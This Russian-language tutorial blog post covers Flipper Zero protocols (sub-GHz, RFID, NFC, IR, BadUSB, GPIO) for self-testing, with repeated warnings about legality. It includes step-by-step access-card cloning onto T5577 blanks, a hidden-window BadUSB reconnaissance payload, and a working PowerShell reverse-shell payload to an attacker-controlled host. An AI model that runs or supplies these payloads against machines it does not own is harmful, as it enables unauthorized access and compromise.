Мастерство Flipper Zero: каждый протокол, каждый трюк

Путь хакера: серия из 5 частей

Часть 1: Введение → Часть 2: Мастерство Flipper → Часть 3: Основы Kali → Часть 4: Эксплуатация → Часть 5: Полный аудит

В первой части вы сделали первые шаги. Клонировали ИК-пульты, сканировали NFC-карты, наблюдали за активностью sub-GHz спектра и набрали «Hello World» через BadUSB. Вы увидели, что безопасность зачастую лишь иллюзия.

Теперь погружаемся глубже. К концу этой статьи вы будете понимать каждый крупный протокол, с которым может взаимодействовать ваш Flipper Zero. Не только как ими пользоваться, но и почему они работают именно так, и что это значит для безопасности.

Честное предупреждение: Вы обнаружите, что несколько вещей, которые считали защищёнными... таковыми не являются.

Философия Flipper

Прежде чем перейти к протоколам, давайте выстроим правильный образ мышления. Flipper Zero не является «устройством для взлома» в голливудском смысле. Это инструмент для обучения, который позволяет взаимодействовать с радиочастотами и аппаратными протоколами, которые обычно невидимы.

Представьте его как увеличительное стекло для беспроводных сигналов. Сигналы были там всегда. Вы просто не могли их видеть. Теперь можете.

Это различие важно, потому что оно меняет ваш подход к безопасности. Большинство «мер безопасности» полагаются на неизвестность, на предположение, что атакующие не будут знать, как взаимодействовать с системой. Ваш Flipper убирает эту неизвестность. Он показывает в точности, что передаётся и принимается. А когда вы можете это видеть, вы можете оценить, существует ли реальная защита.

Спойлер: Чаще всего реальной защиты нет.

⚠️ Напоминание: Только свои устройства

Всё в этой статье предназначено для тестирования ВАШИХ СОБСТВЕННЫХ устройств, карт и систем. Техники работают на чужом оборудовании тоже, в этом и суть. Но использование их на системах, которые вам не принадлежат, незаконно. Тестируйте свою безопасность. Обнаруживайте свои уязвимости. Таков путь.

Sub-GHz: Невидимый спектр

Радиочастоты ниже гигагерца повсюду. Ваши гаражные ворота, автомобильный брелок, метеостанция, беспроводной дверной звонок, датчики давления в шинах, устройства умного дома. Все они постоянно передают сигналы в диапазонах ниже 1 ГГц.

Почему sub-GHz? Низкие частоты распространяются дальше и лучше проникают сквозь стены, чем высокие частоты вроде WiFi (2.4/5 ГГц). Это делает их идеальными для устройств, которым нужна надёжная связь на расстоянии без прямой видимости.

Ландшафт частот

Разные регионы используют разные частоты из-за регулирования:

• 315 МГц: Северная Америка. Старые гаражные ворота, автобрелки
• 390 МГц: Северная Америка. Гаражные ворота, некоторые автомобильные системы
• 433.92 МГц: По всему миру. Метеостанции, датчики, европейские устройства, многие IoT-продукты
• 868 МГц: Европа. Умный дом, LoRa, счётчики коммунальных услуг
• 915 МГц: Америки. LoRa, умный дом, промышленное оборудование

С прошивкой Momentum ваш Flipper может передавать и принимать во всех этих диапазонах независимо от вашего физического местоположения. Стоковая прошивка ограничивает вас легальными частотами вашего региона. Это важно для обучения: у вас могут быть устройства, работающие на «иностранных» частотах.

Проект: Анализ вашей гаражной двери

Время: 15 минут

Чему научитесь: Разница между статическими и скользящими кодами и почему это важно

Шаги:

1. Перейдите в Sub-GHz → Read
2. Встаньте рядом с гаражом (не настолько близко, чтобы дверь открылась)
3. Нажмите кнопку пульта гаражных ворот
4. Наблюдайте, как Flipper захватывает сигнал
5. Изучите, что было захвачено. Обратите внимание на определённый протокол

Что вы можете увидеть:

• Princeton, Linear, Chamberlain (старые): Статические коды. Один и тот же код передаётся каждый раз. Уязвимы для атак повтора.
• KeeLoq, Security+ 2.0, Rolling Code: Скользящие коды. Каждая передача использует другой код из синхронизированной последовательности. Простой повтор невозможен.

Реальность: Если ваши гаражные ворота используют статический код (многие, установленные до ~2015 года, именно такие), любой, кто перехватит этот сигнал один раз, сможет воспроизводить его вечно. Ваш гараж защищён предположением, что никто не прослушивает. Это предположение только что рухнуло.

Скользящие коды: как они работают

Современные гаражные ворота и автомобильные брелки используют скользящие коды (также называемые прыгающими кодами). Вот как это работает:

1. И передатчик (ваш пульт), и приёмник (ваш гараж) делят общий секретный seed и алгоритм
2. При каждом нажатии кнопки генерируется следующий код в синхронизированной последовательности
3. Приёмник принимает текущий код ИЛИ любой из следующих ~256 кодов (на случай нажатий вне зоны приёма)
4. Использованный код аннулируется навсегда

Это означает, что захват и повтор сигнала со скользящим кодом не работает. К моменту повтора код уже аннулирован.

Почему это важно

Скользящие коды были изобретены потому, что мир sub-GHz обнаружил: безопасность через неизвестность не работает. Кто-то нашёл способ перехватывать и воспроизводить сигналы, и индустрии пришлось внедрять настоящую криптографическую защиту. Этот паттерн повторяется во всех протоколах, которые мы обсудим: безопасность добавляется только после того, как кто-то продемонстрирует уязвимость.

Проект: Перехват данных метеостанции

Время: 10 минут

Чему научитесь: Сколько данных передаётся без какой-либо защиты

Шаги:

1. Перейдите в Sub-GHz → Read
2. Подождите рядом с любым беспроводным метеодатчиком (уличный термометр, дождемер и т.д.)
3. Большинство передают каждые 30-60 секунд
4. Перехватите передачу
5. Обратите внимание на протокол и декодированные данные

Что вы найдёте: Температура, влажность, заряд батареи, ID датчика. Всё передаётся открытым текстом. Без шифрования, без аутентификации. Любой приёмник, настроенный на эту частоту, получает все данные. А теперь подумайте, что ещё в вашем районе передаёт сигналы...

RFID: Мир 125 кГц

Низкочастотный RFID (125 кГц) представляет собой более старую и простую технологию бесконтактных карт. Вы встретите его в картах фитнес-клубов, старых пропусках офисных зданий, парковочных системах и системах входа в жилые комплексы.

И с безопасностью тут почти повсеместно ужасно.

Как работает RFID 125 кГц

Эти карты пассивные, в них нет батареи. Когда вы подносите карту к считывателю, электромагнитное поле считывателя питает карту, и карта передаёт свой ID-номер. Вот и всё. Без запрос-ответа. Без шифрования. Просто: «Я карта номер 12345».

Считыватель говорит «окей» и предоставляет доступ, основываясь исключительно на знании этого ID-номера.

Вы видите проблему.

Распространённые типы карт 125 кГц

• EM4100: Чрезвычайно распространён. Просто передаёт 40-битный ID. Нулевая безопасность.
• HID Prox: Самая распространённая корпоративная карта доступа. Передаёт код объекта + номер карты. Нулевая безопасность.
• Indala: Менее распространён. Другая кодировка, но та же проблема: никакой защиты.
• AWID: Ещё один вариант. Та же фундаментальная слабость.

Заметили закономерность? Все эти карты просто передают ID. «Безопасность» заключается в том, что для считывания этого ID нужно специальное оборудование. Ваш Flipper и есть это оборудование.

Проект: Клонирование карты фитнес-клуба

Время: 5 минут

Что понадобится: Ваша карта фитнес-клуба/бассейна/подъезда 125 кГц, чистая карта T5577 ($1-2 за штуку)

Шаги:

1. Перейдите в 125 kHz RFID → Read
2. Приложите карту к задней стороне Flipper (где находится RFID-антенна)
3. Дождитесь успешного считывания. Обратите внимание на тип карты и ID
4. Сохраните карту с узнаваемым именем
5. Для теста эмуляции: Saved → Select Card → Emulate
6. Поднесите Flipper к считывателю вашего фитнес-клуба. Должен работать идентично вашей карте

Для записи на чистую T5577:

1. Перейдите к сохранённой карте
2. Выберите Write
3. Приложите чистую карту T5577 к Flipper
4. Дождитесь подтверждения записи
5. Теперь у вас есть физический клон

Почему это важно: Вся модель безопасности этой системы контроля доступа только что рухнула. Любой, кто может оказаться рядом с вашей картой на две секунды, может её клонировать. Подумайте об этом, когда в следующий раз оставите сумку без присмотра в раздевалке.

T5577: Ваша волшебная карта

T5577 это перезаписываемая RFID-карта, способная эмулировать большинство типов карт 125 кГц. Она как чистый CD-R для карт доступа. Запишите на неё данные любой карты, и она станет этой картой.

Купите пачку из 10 штук для тестов. Они дешёвые и невероятно полезные для понимания того, насколько слаба вся эта технология. Можно записать данные одной карты, протестировать, потом записать данные другой. Всё на одну и ту же физическую карту.

Что это раскрывает

«Безопасность» RFID 125 кГц это чистый театр. Эти системы предполагают, что вы не можете считать карту, не можете скопировать данные и не можете записать их на другую карту. Все три предположения ложны при использовании потребительского оборудования. Если на вашей работе используются карты HID Prox (самая распространённая корпоративная карта доступа), любой сотрудник с Flipper может клонировать доступ любого другого сотрудника. Пусть это осядет.

NFC: Мир 13.56 МГц

Высокочастотный NFC (13.56 МГц) это более новое поколение. Он обеспечивает бесконтактные платежи, современные карты доступа, транспортные системы, ключи от отелей и функцию «приложи и плати» вашего телефона.

Хорошая новость: Некоторые NFC-карты действительно имеют реальную защиту.

Плохая новость: Многие не имеют.

Типы NFC-карт

• MIFARE Classic: Чрезвычайно распространён в картах доступа, транспорте, отелях. Использует проприетарное шифрование, которое было взломано много лет назад. Уязвим.
• MIFARE Ultralight: Простые карты с минимальной защитой. Часто используются для одноразовых транспортных билетов.
• NTAG: Распространены в NFC-метках для автоматизации. Обычно минимальная защита.
• MIFARE DESFire: Действительно безопасен. Использует шифрование AES. Применяется в новых высокозащищённых системах.
• EMV (Платёжные карты): Ваша кредитка. Сильное шифрование, лимиты транзакций, обнаружение мошенничества.

Проект: Анализ вашего рабочего пропуска

Время: 10 минут

Чему научитесь: Есть ли на вашей работе реальная безопасность или театр безопасности

Шаги:

1. Перейдите в NFC → Read
2. Приложите рабочий пропуск к задней стороне Flipper
3. Дождитесь завершения считывания
4. Изучите, что показывает Flipper

Интерпретация результатов:

• MIFARE Classic 1K/4K: Ваш пропуск использует взломанное шифрование. При наличии времени и нужных инструментов его можно клонировать.
• MIFARE Ultralight: Минимальная защита. Часто клонируется.
• MIFARE DESFire: Действительно защищён. Вы увидите ограниченные данные.
• Unknown/Locked: Может быть проприетарным или DESFire. Нужно дополнительное исследование.

Проверка реальностью: Большинство корпоративных пропусков до сих пор MIFARE Classic. Шифрование было публично взломано в 2008 году. Восемнадцать лет назад. Если на вашем пропуске написано MIFARE Classic, ваш работодатель использует систему безопасности, которую криптографы считают смехотворно уязвимой.

Клонирование UID vs полное клонирование

Важное различие: Flipper всегда может считать и эмулировать UID (Unique Identifier) карты, её серийный номер. Некоторые системы доступа проверяют только UID. Для таких систем достаточно простой эмуляции.

Более продвинутые системы проверяют и UID, И зашифрованные данные, хранящиеся на карте. Для них нужно клонировать также зашифрованные секторы. Для MIFARE Classic это возможно (шифрование взломано), но для DESFire нет.

Проект: Анализ ключ-карты отеля

Время: 5 минут (в следующий раз, когда будете в отеле)

Чему научитесь: Как на самом деле работает безопасность отелей

Шаги:

1. Считайте ключ-карту отеля через NFC → Read
2. Обратите внимание на тип карты
3. Посмотрите, какие данные доступны для чтения

Что вы обычно обнаружите: Большинство ключей от отелей это MIFARE Ultralight или Classic. На некоторых в читаемых секторах видны номер комнаты, дата выезда или другие метаданные. «Безопасность» в том, что у гостей обычно нет NFC-считывателей. У вас теперь есть.

Магические карты для NFC

Как T5577 для 125 кГц, существуют «магические» NFC-карты для 13.56 МГц:

• Gen1 (UID изменяемый): Позволяет записать произвольный UID. Обнаруживается некоторыми считывателями как «магическая».
• Gen2 (CUID): Лучшая совместимость. Изменения UID сохраняются после перезагрузки.
• Gen3 (UFUID): Может заблокировать UID после записи. Выглядит как обычная карта.
• Gen4 (Ultimate Magic): Самая гибкая. Может эмулировать несколько типов карт.

Для обучения карты Gen2 оптимальный выбор. Дешёвые, широко совместимые и достаточные для большинства тестов.

Инфракрасный: Полный контроль

Вы уже создавали ИК-пульты в первой части. Давайте копнём глубже.

Создание идеальной библиотеки пультов

Flipper может хранить неограниченное количество ИК-пультов. Но обучение каждой кнопке по отдельности утомительно. Лучший подход: используйте базы данных сообщества.

Прошивка Momentum включает IRDB, огромную базу данных предварительно записанных пультов. Также можно скачать пульты из GitHub-репозиториев и добавить на SD-карту Flipper.

Проект: Постройте свой ИК-арсенал

Время: 20 минут

Шаги:

1. На Flipper: Infrared → Universal Remotes
2. Вы найдёте готовые универсальные пульты для ТВ, кондиционеров, проекторов и т.д.
3. Протестируйте их на своих устройствах
4. Для устройств, которые не покрыты, используйте Learn New Remote
5. Организуйте сохранённые пульты по комнатам или типам устройств

Продвинутый приём: Создайте «пульты для комнат», объединяющие все ИК-устройства одного помещения. Один файл управляет ТВ, саундбаром, освещением и кондиционером.

Чему научитесь: ИК-связь универсальна и не защищена. Любое устройство с ИК-приёмником может управляться любым устройством с ИК-передатчиком. Это сделано намеренно. ИК был спроектирован для удобства, а не для безопасности. Ваш Flipper просто делает это удобство универсальным.

Захват Raw IR

Некоторые устройства используют нестандартные ИК-протоколы. Для них Flipper может захватить raw-сигнал, точный тайминг импульсов включения/выключения, и воспроизвести его безупречно.

Перейдите в Infrared → Learn New → Raw, когда стандартное обучение не распознаёт сигнал.

BadUSB: Альтернатива Rubber Ducky

В первой части вы заставили Flipper набрать «Hello World». Теперь начинаются серьёзные вещи.

BadUSB (также известный как атаки USB Rubber Ducky) эксплуатирует фундаментальный изъян в том, как компьютеры обрабатывают USB-устройства: они безоговорочно доверяют клавиатурам. Когда вы подключаете устройство, которое представляется клавиатурой, компьютер принимает каждое нажатие клавиши без вопросов.

Ваш Flipper может набирать примерно 1000 символов в секунду. Быстрее любого человека. Достаточно быстро, чтобы выполнить сложную атаку прежде, чем кто-либо успеет отреагировать.

Основы DuckyScript

Пейлоады BadUSB используют DuckyScript, простой скриптовый язык. Ключевые команды:

REM This is a comment
DELAY 1000
STRING Hello World
ENTER
GUI r
ALT F4
CTRL c
TAB
DOWNARROW
ESCAPE

Проект: Сборщик системной информации

Время: 15 минут

Что делает: Открывает PowerShell, собирает системную информацию, сохраняет в файл (на ВАШЕЙ машине)

REM System Info Grabber - Run on YOUR machine only
DELAY 1000
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden
ENTER
DELAY 1000
STRING $info = @{
ENTER
STRING Hostname = $env:COMPUTERNAME
ENTER
STRING Username = $env:USERNAME
ENTER
STRING Domain = $env:USERDOMAIN
ENTER
STRING IP = (Get-NetIPAddress -AddressFamily IPv4).IPAddress
ENTER
STRING OS = (Get-WmiObject Win32_OperatingSystem).Caption
ENTER
STRING }
ENTER
STRING $info | ConvertTo-Json | Out-File "$env:USERPROFILE\Desktop\sysinfo.json"
ENTER
STRING exit
ENTER

Чему научитесь: Менее чем за 3 секунды физического доступа атакующий мог бы собрать имя хоста, имя пользователя, домен, IP-адреса и версию ОС. Это разведка. Представьте, что ещё можно набрать за эти 3 секунды.

Проект: Настройка обратной оболочки

Время: 30 минут (включая настройку Kali)

Что делает: Создаёт обратное соединение с вашей машиной Kali (подготовка к части 3)

Необходимые условия: Запущенный Kali Linux (VM подойдёт), знание IP-адреса вашего Kali

На Kali запустите слушатель:

nc -lvnp 4444

Пейлоад BadUSB (цель Windows):

REM Reverse Shell - Replace KALI_IP with your Kali's IP
DELAY 1000
GUI r
DELAY 500
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('KALI_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
ENTER

Что происходит: Целевая машина открывает PowerShell-соединение обратно к вашему Kali. Теперь у вас есть доступ к командной строке этой машины. Это суть формулы: физический доступ + BadUSB = полная компрометация. Подробнее об этом в части 3.

⚠️ Эти пейлоады настоящие

Пейлоад обратной оболочки выше реально работает. Используйте его ТОЛЬКО на машинах, которые принадлежат вам, для тестирования. Запуск на чужой машине является уголовным преступлением (несанкционированный доступ + установка бэкдора). Цель в том, чтобы понять угрозу, а не создать её.

Забавные пейлоады для демонстраций

Для демонстрации BadUSB другим людям (на их машине с их разрешения), вот несколько безобидных, но впечатляющих пейлоадов:

REM Rick Roll - Opens YouTube
DELAY 1000
GUI r
DELAY 500
STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ
ENTER

REM Fake Windows Update - Fullscreen prank page
DELAY 1000
GUI r
DELAY 500
STRING https://fakeupdate.net/win10ue/
ENTER
DELAY 2000
F11

REM Flip Screen Upside Down (Windows)
DELAY 1000
CTRL ALT DOWNARROW

GPIO: Аппаратное расширение

GPIO-пины (General Purpose Input/Output) Flipper позволяют подключать внешние модули и расширять возможности. Именно здесь Flipper превращается из карманного инструмента в платформу разработки.

Обязательные модули

• WiFi Dev Board: Добавляет WiFi-возможности: захват пакетов, тестирование deauth, атаки Evil Twin. Необходим начиная с части 3.
• Внешняя антенна CC1101: Значительно увеличивает дальность Sub-GHz. Встроенная антенна работает, но внешняя лучше для серьёзной работы.
• ESP32 Marauder: Превращает Flipper в WiFi/Bluetooth платформу для тестирования. Захватывает хендшейки, выполняет атаки.
• ProtoBoard: Для кастомных проектов и подключения собственного оборудования.

Проект: Настройка WiFi Dev Board

Время: 20 минут

Что понадобится: WiFi Dev Board (официальная или совместимая ESP32)

Шаги:

1. Прошейте Marauder firmware на ESP32 (инструкции на github.com/justcallmekoko/ESP32Marauder)
2. Подключите к GPIO-пинам Flipper
3. Перейдите в GPIO → ESP32 → Marauder
4. Теперь у вас есть сканирование WiFi, deauth и захват пакетов

Почему это важно: Flipper сам по себе не умеет WiFi, у него нет нужного радиомодуля. Но с dev board вы можете сканировать сети, перехватывать WPA-хендшейки и проводить WiFi-атаки. Мы будем активно это использовать в частях 3 и 4.

Продвинутые функции Momentum

Если вы используете прошивку Momentum (а стоит), вот функции, которые стоит изучить:

• Анимации рабочего стола: Чисто косметические, но забавные. Посмотрите пакеты анимаций от сообщества.
• Расширенные протоколы: Momentum добавляет поддержку протоколов, которых нет в стоковой прошивке.
• Хаб приложений: Дополнительные приложения помимо стандартных: игры, инструменты, специализированные утилиты.
• Кастомные пакеты ресурсов: Полностью меняют внешний вид и интерфейс.

Настоящая ценность в разблокированных частотах и расширенной поддержке протоколов. Стоковая прошивка намеренно ограничена для соответствия законодательным и нормативным требованиям. Momentum предполагает, что вы взрослый человек, понимающий правила.

Что вы освоили

Теперь вы понимаете:

• Sub-GHz: Как общаются гаражные ворота, автобрелки и датчики, и почему скользящие коды важны
• RFID 125 кГц: Почему карты фитнес-клубов и старые пропуска тривиально клонируются
• NFC 13.56 МГц: Разница между взломанным шифрованием (MIFARE Classic) и реальной защитой (DESFire)
• Инфракрасный: Как построить библиотеку универсальных пультов и захватывать raw-сигналы
• BadUSB: Почему доверие USB HID является фундаментальной уязвимостью и как её эксплуатировать
• GPIO: Как расширить возможности до WiFi, увеличенного радиуса действия и кастомного оборудования

Ваш Flipper теперь оружие. Но по сравнению с Kali Linux он лишь отвёртка, тогда как Kali это целая мастерская. Пора запускать настоящую среду для тестирования.

Путь хакера

Серия из 5 частей, ведущая от любопытства к мастерству.

Часть 1: Введение Часть 2: Мастерство Flipper ✓ Часть 3: Основы Kali Часть 4: Эксплуатация Часть 5: Полный аудит

Чеклист части 2

☐ Sub-GHz: Гаражная дверь проанализирована, разница между скользящими и статическими кодами понятна

☐ RFID 125 кГц: Карты считаны, минимум один клон протестирован

☐ NFC: Рабочий пропуск проанализирован, тип карты определён

☐ Инфракрасный: Полная библиотека пультов для дома создана

☐ BadUSB: Пейлоад системной информации протестирован, обратная оболочка понятна

☐ GPIO: WiFi dev board готова к части 3

☐ Магические карты: T5577 и/или NFC магические карты приобретены для тестирования

Что дальше

В части 3 мы покидаем точечные возможности Flipper и входим в полноценную среду тестирования на проникновение: Kali Linux.

Вы узнаете:

• Как собрать свою хакерскую лабораторию (установка и настройка VM)
• Сетевая разведка с помощью nmap: картирование каждого устройства в вашей сети
• Беспроводная разведка: захват WiFi-хендшейков с помощью aircrack-ng
• Веб-разведка: обнаружение того, что ваш роутер выставляет наружу
• Связь захватов Flipper с рабочими процессами Kali

Flipper показал, что уязвимости существуют. Kali помогает понять, насколько глубоко они уходят.

Увидимся в части 3.